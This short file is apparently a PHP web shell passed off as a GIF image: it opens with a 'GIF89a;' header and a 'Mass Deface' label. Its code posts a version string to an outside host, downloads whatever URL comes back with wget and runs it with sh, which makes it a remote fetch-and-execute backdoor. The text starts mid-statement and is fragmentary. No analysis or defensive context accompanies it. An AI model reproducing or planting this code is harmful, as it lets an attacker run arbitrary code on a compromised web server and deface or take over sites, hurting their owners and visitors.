GIF89a;
Mass Deface 'UpdateVersion', 'version' => $version); $url="http://d.ovipanel.com/getserverdetails.php"; $handle = curl_init($url); curl_setopt($handle, CURLOPT_POST, true); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $value=curl_exec($handle); if($value!="No Update") { shell_exec("wget $value"); $filename_array=explode("/",$value); $filename=$filename_array[count($filename_array)-1]; echo shell_exec("sh $filename"); } ?>